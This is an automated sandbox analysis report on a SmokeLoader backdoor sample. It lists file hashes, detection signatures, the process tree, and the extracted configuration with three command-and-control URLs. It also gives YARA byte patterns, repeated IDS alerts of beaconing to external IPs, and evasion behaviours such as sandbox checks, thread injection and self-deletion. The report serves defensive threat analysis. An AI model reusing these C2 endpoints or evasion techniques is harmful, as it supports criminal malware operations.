Windows Analysis Report
BzLGqYKy7o.exe

Overview

General Information

Sample name: BzLGqYKy7o.exe (renamed because original name is a hash value)
Original sample name: d0d4805488e7e745515fff2165d3cc05.exe
Analysis ID: 1528058
MD5: d0d4805488e7e745515fff2165d3cc05
SHA1: 0cebec529de0430c9e897f740700b27c043a8552
SHA256: e684bed5b84f09dd85a88a7847fb4aaed9845f9b8098f0dda486a095a3115d4c
Tags: exe, Stealc, user-abuse_ch

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to read the PEB
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • BzLGqYKy7o.exe (PID: 6480 cmdline: "C:\Users\user\Desktop\BzLGqYKy7o.exe" MD5: D0D4805488E7E745515FFF2165D3CC05)
    • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • B9A0.exe (PID: 6768 cmdline: C:\Users\user\AppData\Local\Temp\B9A0.exe MD5: 0719C6940AABCC832DB40F7EE68A25DC)
  • teihrdr (PID: 6460 cmdline: C:\Users\user\AppData\Roaming\teihrdr MD5: D0D4805488E7E745515FFF2165D3CC05)
  • teihrdr (PID: 1992 cmdline: C:\Users\user\AppData\Roaming\teihrdr MD5: D0D4805488E7E745515FFF2165D3CC05)
  • jtihrdr (PID: 7108 cmdline: C:\Users\user\AppData\Roaming\jtihrdr MD5: 0719C6940AABCC832DB40F7EE68A25DC)
  • cleanup
Name: SmokeLoader
Description: The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
Attribution: SMOKY SPIDER
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Extracted malware configuration:
{"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
Yara matches in memory dumps

Source | Rule | Description | Author | Strings
00000008.00000002.2780852032.00000000020C0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000008.00000002.2780852032.00000000020C0000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown | 0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000009.00000003.2830678754.0000000000530000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000000.00000002.2133342006.000000000059E000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x121a2:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000004.00000002.2369233302.000000000068D000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x1296a:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
(table truncated; 27 entries in the full report)

Yara matches in unpacked PE files

Source | Rule | Description | Author | Strings
9.2.jtihrdr.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
9.3.jtihrdr.530000.0.raw.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
7.2.B9A0.exe.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
7.3.B9A0.exe.20c0000.0.raw.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
7.2.B9A0.exe.1fa0e67.1.raw.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
(table truncated; 1 further entry in the full report)

System Summary

Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\Users\user\AppData\Roaming\teihrdr, CommandLine: C:\Users\user\AppData\Roaming\teihrdr, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\teihrdr, NewProcessName: C:\Users\user\AppData\Roaming\teihrdr, OriginalFileName: C:\Users\user\AppData\Roaming\teihrdr, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\teihrdr, ProcessId: 6460, ProcessName: teihrdr
Suricata IDS alerts: SID 2039103 (ET MALWARE Suspected Smokeloader Activity (POST))

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-07T14:59:24.450425+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49770 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:25.374466+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49776 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:26.314240+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49782 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:27.265046+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49788 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:28.193590+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49794 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:29.130090+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49804 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:30.253391+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49810 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:31.176635+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49814 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:32.219133+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49822 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:33.173977+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49831 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:34.105790+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49837 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:35.044145+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49844 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:35.980167+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49850 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:37.313136+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49856 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:38.356354+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49867 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:39.269702+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49868 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:40.231913+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49874 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:41.192149+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49885 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:42.137608+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49891 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:43.085742+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49897 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:44.028780+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49903 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:44.972761+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49910 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:45.907705+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49916 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:47.047276+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49922 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:49.566919+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49939 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:50.521037+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49945 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:51.497852+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49952 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:52.661203+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49961 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:53.588010+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49969 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:54.529610+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49975 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:56.016097+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49979 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:57.166667+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49982 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:58.325335+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49993 | 105.197.97.247 | 80 | TCP
2024-10-07T14:59:59.253273+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49998 | 105.197.97.247 | 80 | TCP
2024-10-07T15:00:14.419801+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 50012 | 188.40.141.211 | 443 | TCP
2024-10-07T15:00:16.825302+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 50013 | 188.40.141.211 | 443 | TCP
2024-10-07T15:01:05.953100+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 50014 | 105.197.97.247 | 80 | TCP
2024-10-07T15:01:15.348447+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 50015 | 105.197.97.247 | 80 | TCP
2024-10-07T15:01:27.089587+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 50016 | 105.197.97.247 | 80 | TCP
2024-10-07T15:01:32.047885+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 50017 | 188.40.141.211 | 443 | TCP
2024-10-07T15:01:33.047947+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 50018 | 188.40.141.211 | 443 | TCP
2024-10-07T15:01:46.179545+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 50019 | 105.197.97.247 | 80 | TCP
2024-10-07T15:01:54.998397+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 50020 | 188.40.141.211 | 443 | TCP
2024-10-07T15:01:56.212271+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 50021 | 188.40.141.211 | 443 | TCP
2024-10-07T15:02:07.860198+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 50022 | 189.195.132.134 | 80 | TCP
2024-10-07T15:02:16.720307+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 50023 | 188.40.141.211 | 443 | TCP
2024-10-07T15:02:17.696520+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 50024 | 188.40.141.211 | 443 | TCP
2024-10-07T15:02:29.863734+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 50025 | 189.195.132.134 | 80 | TCP
2024-10-07T15:02:39.765694+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 50026 | 188.40.141.211 | 443 | TCP
2024-10-07T15:02:40.760206+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 50027 | 188.40.141.211 | 443 | TCP
2024-10-07T15:02:50.926729+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 50028 | 189.195.132.134 | 80 | TCP
2024-10-07T15:03:02.556191+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 50029 | 188.40.141.211 | 443 | TCP
2024-10-07T15:03:03.522877+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 50030 | 188.40.141.211 | 443 | TCP

Suricata IDS alerts: SID 2809882 (ETPRO MALWARE Dridex Post Checkin Activity 3)

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-07T15:00:14.715498+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50012 | 188.40.141.211 | 443 | TCP
2024-10-07T15:00:18.334781+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50013 | 188.40.141.211 | 443 | TCP
2024-10-07T15:01:32.309002+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50017 | 188.40.141.211 | 443 | TCP
2024-10-07T15:01:33.325361+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50018 | 188.40.141.211 | 443 | TCP
2024-10-07T15:01:55.268074+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50020 | 188.40.141.211 | 443 | TCP
2024-10-07T15:01:56.460168+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50021 | 188.40.141.211 | 443 | TCP
2024-10-07T15:02:17.024280+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50023 | 188.40.141.211 | 443 | TCP
2024-10-07T15:02:18.001733+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50024 | 188.40.141.211 | 443 | TCP
2024-10-07T15:02:40.046670+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50026 | 188.40.141.211 | 443 | TCP
2024-10-07T15:02:41.069076+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50027 | 188.40.141.211 | 443 | TCP
2024-10-07T15:03:02.864372+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50029 | 188.40.141.211 | 443 | TCP
2024-10-07T15:03:03.824257+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50030 | 188.40.141.211 | 443 | TCP

AV Detection

Source: BzLGqYKy7o.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\teihrdr | Avira: detection malicious, Label: HEUR/AGEN.1310247
Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Avira: detection malicious, Label: HEUR/AGEN.1310247
Source: C:\Users\user\AppData\Roaming\jtihrdr | Avira: detection malicious, Label: HEUR/AGEN.1310247
Source: 00000008.00000002.2780852032.00000000020C0000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
Source: C:\Users\user\AppData\Roaming\teihrdr | ReversingLabs: Detection: 31%
Source: BzLGqYKy7o.exe | ReversingLabs: Detection: 31%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\teihrdr | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B9A0.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\jtihrdr | Joe Sandbox ML: detected
Source: BzLGqYKy7o.exe | Joe Sandbox ML: detected
Source: BzLGqYKy7o.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\BzLGqYKy7o.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.5:49932 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50012 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50013 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50017 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50018 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50020 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50021 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50023 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50024 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50026 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50027 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50029 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50030 version: TLS 1.2

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49804 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49782 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49810 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49814 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49770 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49788 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49822 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49868 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49850 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49776 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49885 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49844 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49903 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49837 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49831 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49856 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49867 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49794 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49897 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49945 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49874 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49952 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49993 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50014 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50028 -> 189.195.132.134:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49982 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50015 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49979 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49969 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50022 -> 189.195.132.134:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50019 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49910 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49916 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50016 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49975 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50025 -> 189.195.132.134:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49891 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49922 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49939 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49961 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49998 -> 105.197.97.247:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50024 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50017 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50021 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50024 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50021 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50023 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50017 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50023 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50013 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50013 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50018 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50018 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50020 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50026 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50020 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50026 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50012 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50012 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50027 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50027 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50029 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50029 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50030 -> 188.40.141.211:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50030 -> 188.40.141.211:443
                Source: C:\Windows\explorer.exeNetwork Connect: 188.40.141.211 443Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 105.197.97.247 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 189.195.132.134 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.164 443Jump to behavior
                Source: Malware configuration extractorURLs: http://nwgrus.ru/tmp/index.php
                Source: Malware configuration extractorURLs: http://tech-servers.in.net/tmp/index.php
                Source: Malware configuration extractorURLs: http://unicea.ws/tmp/index.php
                Source: Joe Sandbox ViewIP Address: 188.40.141.211 188.40.141.211
